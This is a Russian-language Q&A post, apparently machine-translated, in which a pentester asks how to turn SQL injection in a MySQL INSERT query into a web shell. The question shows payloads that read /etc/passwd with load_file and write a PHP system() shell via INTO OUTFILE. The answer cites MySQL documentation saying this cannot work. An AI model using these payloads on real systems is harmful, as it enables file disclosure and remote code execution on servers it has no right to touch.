SELECT INTO OUTFILE в INSERT MySQL Query

Question

Вот интересный сценарий. Во время недавнего пентеста я столкнулся с SQL-инъекцией внутри запроса INSERT. Код бэкенд выглядит примерно так:

$sqlquery= "INSERT INTO sometable set col1='" + $_GET['param'] + "'"; 

Я могу вставить произвольные значения в файл и использовать даже выбора вложенного запроса вставить содержимое «/ и т.д./пароль» в col1 внутри sometable и прочитайте его позже, используя совершенно другую функциональность где-нибудь еще в приложении.

$sqlquery= "INSERT INTO sometable set col1='1', (SELECT load_file('/etc/passwd'))"; 

Задача состоит в том, чтобы записать файл на диск с помощью INTO OUTFILE (я имею FILE privs и корневой документ доступен для записи пользователя MySQL - проверено). Похоже, что MySQL не поддерживает следующее:

$sqlquery= "INSERT INTO sometable set col1='1', (SELECT 'a' INTO OUTFILE '/tmp/data.txt')"; 

Цель состоит в том, чтобы написать PHP веб-оболочку в папку, где у меня есть права на запись. Окончательный запрос, который должен быть выполнен так:

$sqlquery= "INSERT INTO sometable set col1='1', (SELECT '<?php system($_GET['x']) ?>' INTO OUTFILE'/var/www/app/imgupload/shell.php')"; 

MySQL ожидает возвращаемые данные по суб-запросов, поэтому приведенное выше утверждение, кажется, не работает, так как INTO OUTFILE будет записывать данные на диск, вместо того, чтобы вернуться это для MySQL.

Как вы думаете, есть ли обходной путь?

Answer 1

От http://dev.mysql.com/doc/refman/5.7/en/select-into.html

Спецификатор INTO не следует использовать в вложенным SELECT, потому что такой SELECT, должен вернуть результат к внешнему контексту.

Так что ответ - нет, я думаю.

Также см. mysql insert can't with select into outfile?